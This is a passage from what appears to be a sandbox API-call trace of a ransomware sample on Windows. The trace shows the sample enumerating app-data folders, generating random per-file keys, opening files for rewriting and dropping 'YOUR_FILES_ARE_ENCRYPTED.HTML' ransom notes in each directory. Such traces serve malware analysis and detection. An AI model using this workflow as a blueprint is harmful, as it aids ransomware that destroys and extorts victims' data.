lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\Microsoft.ZuneVideo_3.6.13251.0_x64__8wekyb3d8bbwe\\ActivationStore\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\Microsoft.ZuneVideo_3.6.13251.0_x64__8wekyb3d8bbwe\\ActivationStore\\*" [0121.159] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\Microsoft.ZuneVideo_3.6.13251.0_x64__8wekyb3d8bbwe\\ActivationStore\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfc8507ce, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xfc8507ce, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xfc95ba08, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x311bec0, dwReserved1=0x62eb58, cFileName=".", cAlternateFileName="")) returned 0x6268b8 [0121.160] FindNextFileW (in: hFindFile=0x6268b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfc8507ce, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xfc8507ce, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xfc95ba08, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x311bec0, dwReserved1=0x62eb58, cFileName="..", cAlternateFileName="")) returned 1 [0121.160] FindNextFileW (in: hFindFile=0x6268b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfc8507ce, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xfcdd415e, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xfcdd415e, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x10000, dwReserved0=0x311bec0, dwReserved1=0x62eb58, cFileName="ActivationStore.dat", cAlternateFileName="ACTIVA~1.DAT")) returned 1 [0121.160] StrStrIW (lpFirst="ActivationStore.dat", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.160] wnsprintfW (in: pszDest=0x3106fd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\Microsoft.ZuneVideo_3.6.13251.0_x64__8wekyb3d8bbwe\\ActivationStore\\ActivationStore.dat") returned 169 [0121.161] PathFindExtensionW (pszPath="ActivationStore.dat") returned=".dat" [0121.161] lstrlenW (lpString=".dat") returned 4 [0121.161] PathFindExtensionW (pszPath="ActivationStore.dat") returned=".dat" [0121.161] SystemFunction036 (in: RandomBuffer=0x19de58, RandomBufferLength=0x20 | out: RandomBuffer=0x19de58) returned 1 [0121.161] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\Microsoft.ZuneVideo_3.6.13251.0_x64__8wekyb3d8bbwe\\ActivationStore\\ActivationStore.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.zunevideo_8wekyb3d8bbwe\\microsoft.zunevideo_3.6.13251.0_x64__8wekyb3d8bbwe\\activationstore\\activationstore.dat"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x320 [0121.161] GetFileSizeEx (in: hFile=0x320, lpFileSize=0x19de7c | out: lpFileSize=0x19de7c*=65536) returned 1 [0121.161] GetProcessHeap () returned 0x600000 [0121.161] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x670340 [0121.163] wsprintfW (in: param_1=0x19dd96, param_2="%02X" | out: param_1="3F") returned 2 [0121.164] wsprintfW (in: param_1=0x19dd9a, param_2="%02X" | out: param_1="A3") returned 2 [0121.164] wsprintfW (in: param_1=0x19dd9e, param_2="%02X" | out: param_1="F4") returned 2 [0121.164] wsprintfW (in: param_1=0x19dda2, param_2="%02X" | out: param_1="A0") returned 2 [0121.164] wsprintfW (in: param_1=0x19dda6, param_2="%02X" | out: param_1="1F") returned 2 [0121.164] wsprintfW (in: param_1=0x19ddaa, param_2="%02X" | out: param_1="36") returned 2 [0121.164] wsprintfW (in: param_1=0x19ddae, param_2="%02X" | out: param_1="A2") returned 2 [0121.164] wsprintfW (in: param_1=0x19ddb2, param_2="%02X" | out: param_1="E4") returned 2 [0121.164] wsprintfW (in: param_1=0x19ddb6, param_2="%02X" | out: param_1="D8") returned 2 [0121.164] wsprintfW (in: param_1=0x19ddba, param_2="%02X" | out: param_1="FF") returned 2 [0121.164] wsprintfW (in: param_1=0x19ddbe, param_2="%02X" | out: param_1="EA") returned 2 [0121.164] wsprintfW (in: param_1=0x19ddc2, param_2="%02X" | out: param_1="A2") returned 2 [0121.164] wsprintfW (in: param_1=0x19ddc6, param_2="%02X" | out: param_1="6C") returned 2 [0121.164] wsprintfW (in: param_1=0x19ddca, param_2="%02X" | out: param_1="8B") returned 2 [0121.164] wsprintfW (in: param_1=0x19ddce, param_2="%02X" | out: param_1="C0") returned 2 [0121.164] wsprintfW (in: param_1=0x19ddd2, param_2="%02X" | out: param_1="51") returned 2 [0121.164] wsprintfW (in: param_1=0x19ddd6, param_2="%02X" | out: param_1="E7") returned 2 [0121.164] wsprintfW (in: param_1=0x19ddda, param_2="%02X" | out: param_1="8D") returned 2 [0121.164] wsprintfW (in: param_1=0x19ddde, param_2="%02X" | out: param_1="ED") returned 2 [0121.164] wsprintfW (in: param_1=0x19dde2, param_2="%02X" | out: param_1="20") returned 2 [0121.164] wsprintfW (in: param_1=0x19dde6, param_2="%02X" | out: param_1="AD") returned 2 [0121.164] wsprintfW (in: param_1=0x19ddea, param_2="%02X" | out: param_1="8A") returned 2 [0121.164] wsprintfW (in: param_1=0x19ddee, param_2="%02X" | out: param_1="03") returned 2 [0121.164] wsprintfW (in: param_1=0x19ddf2, param_2="%02X" | out: param_1="00") returned 2 [0121.164] wsprintfW (in: param_1=0x19ddf6, param_2="%02X" | out: param_1="06") returned 2 [0121.164] wsprintfW (in: param_1=0x19ddfa, param_2="%02X" | out: param_1="1E") returned 2 [0121.164] wsprintfW (in: param_1=0x19ddfe, param_2="%02X" | out: param_1="07") returned 2 [0121.164] wsprintfW (in: param_1=0x19de02, param_2="%02X" | out: param_1="98") returned 2 [0121.164] wsprintfW (in: param_1=0x19de06, param_2="%02X" | out: param_1="2E") returned 2 [0121.164] wsprintfW (in: param_1=0x19de0a, param_2="%02X" | out: param_1="0A") returned 2 [0121.164] wsprintfW (in: param_1=0x19de0e, param_2="%02X" | out: param_1="AD") returned 2 [0121.164] wsprintfW (in: param_1=0x19de12, param_2="%02X" | out: param_1="78") returned 2 [0121.165] lstrcpyW (in: lpString1=0x6803f4, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\Microsoft.ZuneVideo_3.6.13251.0_x64__8wekyb3d8bbwe\\ActivationStore\\ActivationStore.dat" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\Microsoft.ZuneVideo_3.6.13251.0_x64__8wekyb3d8bbwe\\ActivationStore\\ActivationStore.dat") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\Microsoft.ZuneVideo_3.6.13251.0_x64__8wekyb3d8bbwe\\ActivationStore\\ActivationStore.dat" [0121.165] CreateIoCompletionPort (FileHandle=0x320, ExistingCompletionPort=0x274, CompletionKey=0x670340, NumberOfConcurrentThreads=0x0) returned 0x274 [0121.165] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x670340, lpOverlapped=0x670340) returned 1 [0121.165] FindNextFileW (in: hFindFile=0x6268b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xfc87692b, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xfc87692b, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xfc87692b, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0xa000, dwReserved0=0x311bec0, dwReserved1=0x62eb58, cFileName="ActivationStore.dat.LOG1", cAlternateFileName="ACTIVA~1.LOG")) returned 1 [0121.165] StrStrIW (lpFirst="ActivationStore.dat.LOG1", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.165] wnsprintfW (in: pszDest=0x3106fd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\Microsoft.ZuneVideo_3.6.13251.0_x64__8wekyb3d8bbwe\\ActivationStore\\ActivationStore.dat.LOG1") returned 174 [0121.165] PathFindExtensionW (pszPath="ActivationStore.dat.LOG1") returned=".LOG1" [0121.165] lstrlenW (lpString=".LOG1") returned 5 [0121.165] PathFindExtensionW (pszPath="ActivationStore.dat.LOG1") returned=".LOG1" [0121.165] FindNextFileW (in: hFindFile=0x6268b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xfc87692b, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xfc87692b, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xfc87692b, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x311bec0, dwReserved1=0x62eb58, cFileName="ActivationStore.dat.LOG2", cAlternateFileName="ACTIVA~2.LOG")) returned 1 [0121.165] StrStrIW (lpFirst="ActivationStore.dat.LOG2", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.165] wnsprintfW (in: pszDest=0x3106fd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\Microsoft.ZuneVideo_3.6.13251.0_x64__8wekyb3d8bbwe\\ActivationStore\\ActivationStore.dat.LOG2") returned 174 [0121.165] PathFindExtensionW (pszPath="ActivationStore.dat.LOG2") returned=".LOG2" [0121.165] lstrlenW (lpString=".LOG2") returned 5 [0121.165] PathFindExtensionW (pszPath="ActivationStore.dat.LOG2") returned=".LOG2" [0121.165] FindNextFileW (in: hFindFile=0x6268b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xfc87692b, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xfc87692b, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xfc87692b, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x311bec0, dwReserved1=0x62eb58, cFileName="ActivationStore.dat.LOG2", cAlternateFileName="ACTIVA~2.LOG")) returned 0 [0121.165] FindClose (in: hFindFile=0x6268b8 | out: hFindFile=0x6268b8) returned 1 [0121.165] wnsprintfW (in: pszDest=0x3106fd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\Microsoft.ZuneVideo_3.6.13251.0_x64__8wekyb3d8bbwe\\ActivationStore\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 179 [0121.165] GetProcessHeap () returned 0x600000 [0121.165] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3116fe0 [0121.166] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\Microsoft.ZuneVideo_3.6.13251.0_x64__8wekyb3d8bbwe\\ActivationStore\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.zunevideo_8wekyb3d8bbwe\\microsoft.zunevideo_3.6.13251.0_x64__8wekyb3d8bbwe\\activationstore\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c [0121.166] WriteFile (in: hFile=0x31c, lpBuffer=0x3116fe0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x3116fe0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0121.167] CloseHandle (hObject=0x31c) returned 1 [0121.167] GetProcessHeap () returned 0x600000 [0121.167] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3116fe0 | out: hHeap=0x600000) returned 1 [0121.167] GetProcessHeap () returned 0x600000 [0121.167] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3106fd8 | out: hHeap=0x600000) returned 1 [0121.167] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfc8507ce, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xfc8507ce, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xfc95ba08, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62ebf6, dwReserved1=0x62eb50, cFileName="ActivationStore", cAlternateFileName="ACTIVA~1")) returned 0 [0121.167] FindClose (in: hFindFile=0x626978 | out: hFindFile=0x626978) returned 1 [0121.167] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\Microsoft.ZuneVideo_3.6.13251.0_x64__8wekyb3d8bbwe\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 163 [0121.167] GetProcessHeap () returned 0x600000 [0121.167] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3151028 [0121.167] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\Microsoft.ZuneVideo_3.6.13251.0_x64__8wekyb3d8bbwe\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.zunevideo_8wekyb3d8bbwe\\microsoft.zunevideo_3.6.13251.0_x64__8wekyb3d8bbwe\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0121.168] WriteFile (in: hFile=0x324, lpBuffer=0x3151028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x3151028*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0121.169] CloseHandle (hObject=0x324) returned 1 [0121.169] GetProcessHeap () returned 0x600000 [0121.169] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3151028 | out: hHeap=0x600000) returned 1 [0121.169] GetProcessHeap () returned 0x600000 [0121.169] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0121.171] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfba9af62, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xfba9af62, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xfba9af62, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="RoamingState", cAlternateFileName="ROAMIN~1")) returned 1 [0121.171] StrStrIW (lpFirst="RoamingState", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.171] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\RoamingState") returned 95 [0121.171] GetProcessHeap () returned 0x600000 [0121.171] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0121.171] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\RoamingState" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\RoamingState") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\RoamingState" [0121.171] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\RoamingState", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\RoamingState\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\RoamingState\\*" [0121.171] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\RoamingState\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfba9af62, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xfba9af62, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xfba9af62, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62ebf6, dwReserved1=0x62eb50, cFileName=".", cAlternateFileName="")) returned 0x626638 [0121.172] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfba9af62, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xfba9af62, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xfba9af62, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62ebf6, dwReserved1=0x62eb50, cFileName="..", cAlternateFileName="")) returned 1 [0121.172] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfba9af62, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xfba9af62, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xfba9af62, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62ebf6, dwReserved1=0x62eb50, cFileName="..", cAlternateFileName="")) returned 0 [0121.172] FindClose (in: hFindFile=0x626638 | out: hFindFile=0x626638) returned 1 [0121.172] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\RoamingState\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 125 [0121.172] GetProcessHeap () returned 0x600000 [0121.172] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3151028 [0121.172] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\RoamingState\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.zunevideo_8wekyb3d8bbwe\\roamingstate\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0121.173] WriteFile (in: hFile=0x324, lpBuffer=0x3151028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x3151028*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0121.174] CloseHandle (hObject=0x324) returned 1 [0121.174] GetProcessHeap () returned 0x600000 [0121.174] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3151028 | out: hHeap=0x600000) returned 1 [0121.174] GetProcessHeap () returned 0x600000 [0121.174] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0121.174] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfba9af62, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xfba9af62, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xfbb59ab3, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="Settings", cAlternateFileName="")) returned 1 [0121.174] StrStrIW (lpFirst="Settings", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.174] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\Settings") returned 91 [0121.174] GetProcessHeap () returned 0x600000 [0121.174] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0121.174] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\Settings" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\Settings") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\Settings" [0121.174] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\Settings", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\Settings\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\Settings\\*" [0121.174] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\Settings\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfba9af62, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xfba9af62, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xfbb59ab3, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62ebf6, dwReserved1=0x62eb50, cFileName=".", cAlternateFileName="")) returned 0x626638 [0121.174] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfba9af62, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xfba9af62, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xfbb59ab3, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62ebf6, dwReserved1=0x62eb50, cFileName="..", cAlternateFileName="")) returned 1 [0121.174] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfbb59ab3, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xfbb59ab3, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xfbb59ab3, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62ebf6, dwReserved1=0x62eb50, cFileName="roaming.lock", cAlternateFileName="ROAMIN~1.LOC")) returned 1 [0121.174] StrStrIW (lpFirst="roaming.lock", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.175] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\Settings\\roaming.lock") returned 104 [0121.175] PathFindExtensionW (pszPath="roaming.lock") returned=".lock" [0121.175] lstrlenW (lpString=".lock") returned 5 [0121.175] PathFindExtensionW (pszPath="roaming.lock") returned=".lock" [0121.175] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfba9af62, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xfba9af62, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0x11d3fb2a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0x62ebf6, dwReserved1=0x62eb50, cFileName="settings.dat", cAlternateFileName="")) returned 1 [0121.175] StrStrIW (lpFirst="settings.dat", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.175] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\Settings\\settings.dat") returned 104 [0121.175] PathFindExtensionW (pszPath="settings.dat") returned=".dat" [0121.175] lstrlenW (lpString=".dat") returned 4 [0121.175] PathFindExtensionW (pszPath="settings.dat") returned=".dat" [0121.175] SystemFunction036 (in: RandomBuffer=0x19e16c, RandomBufferLength=0x20 | out: RandomBuffer=0x19e16c) returned 1 [0121.175] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\Settings\\settings.dat" 